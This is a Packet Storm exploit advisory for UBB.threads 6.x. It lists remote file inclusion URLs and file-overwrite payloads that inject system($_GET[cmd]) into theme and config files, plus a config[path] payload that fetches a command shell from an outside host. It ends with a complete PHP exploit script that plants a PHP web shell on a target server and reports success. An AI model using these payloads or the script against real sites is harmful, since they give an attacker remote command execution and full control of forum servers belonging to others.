UBB.threads-6.txt

2006-10-04T00:00:00
ID PACKETSTORM:50585
Type packetstorm
Reporter HACKERS PAL
Modified 2006-10-04T00:00:00

Description

                                        
                                            `Hello,,  
  
UBB.threads Multiple input validation error  
  
Discovered By : HACKERS PAL  
Copy rights : HACKERS PAL  
Website : http://www.soqor.net  
Email Address : security@soqor.net  
  
Tested on Version 6 (6.5.1.1) and other versions maybe affected  
  
  
Remote File including :  
ubbt.inc.php?GLOBALS[thispath]=http://localhost/cmd.txt?&cmd=dir  
ubbt.inc.php?GLOBALS[configdir]=http://localhost/cmd.txt?&cmd=dir  
-------------------------------------------------------  
Files overwrite vulnerabilities  
if magic_qoutes_gpc = off  
  
admin/doedittheme.php?theme[soqor]=".system($_GET[cmd])."&thispath=../  
and open   
includes/theme.inc.php?cmd=ls -la  
or :-  
admin/doeditconfig.php?config[soqor]=".system($_GET[cmd])."&thispath=../  
and open  
includes/config.inc.php?cmd=ls -la  
  
-- # -- # -- # --  
  
if magic_qoutes_gpc = on  
admin/doeditconfig.php?thispath=../includes&config[path]=http://psevil.googlepages.com/cmd.txt?  
  
and you will have a command execution files ..  
example  
dorateuser.php?cmd=ls -la  
calendar.php?cmd=ls -la  
and so many other files which includes using this variable ($config[path])  
-------------------------------------------------------  
  
Full path  
cron/php/subscriptions.php  
  
-------------------------------------------------------  
Exploit :-  
  
#!/usr/bin/php -q -d short_open_tag=on  
<?  
/*  
/* UBB.threads Multiple vulnerabilities  
/* This exploit should allow you to execute commands  
/* By : HACKERS PAL  
/* WwW.SoQoR.NeT  
*/  
print_r('  
/**********************************************/  
/* UBB.threads Command Execution */  
/* by HACKERS PAL <security@soqor.net> */  
/* site: http://www.soqor.net */');  
if ($argc<2) {  
print_r('  
/* -- */  
/* Usage: php '.$argv[0].' host  
/* Example: */  
/* php '.$argv[0].' http://localhost/  
/**********************************************/  
');  
die;  
}  
error_reporting(0);  
ini_set("max_execution_time",0);  
  
$url=$argv[1]."/";  
$exploit="admin/doeditconfig.php?thispath=../includes&config[path]=http://psevil.googlepages.com/cmd.txt?";  
$page=$url.$exploit;  
Function get_page($url)  
{  
  
if(function_exists("file_get_contents"))  
{  
  
$contents = file_get_contents($url);  
  
}  
else  
{  
$fp=fopen("$url","r");  
while($line=fread($fp,1024))  
{  
$contents=$contents.$line;  
}  
  
  
}  
return $contents;  
}  
  
$page = get_page($page);  
  
$newpage = get_page($url."calendar.php");  
  
if(eregi("Cannot execute a blank command",$newpage))  
{  
Die("\n[+] Exploit Finished\n[+] Go To : ".$url."calendar.php?cmd=ls -la\n[+] You Got Your Own PHP Shell\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");  
}  
Else  
{  
Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");  
}  
?>  
  
WwW.SoQoR.NeT  
`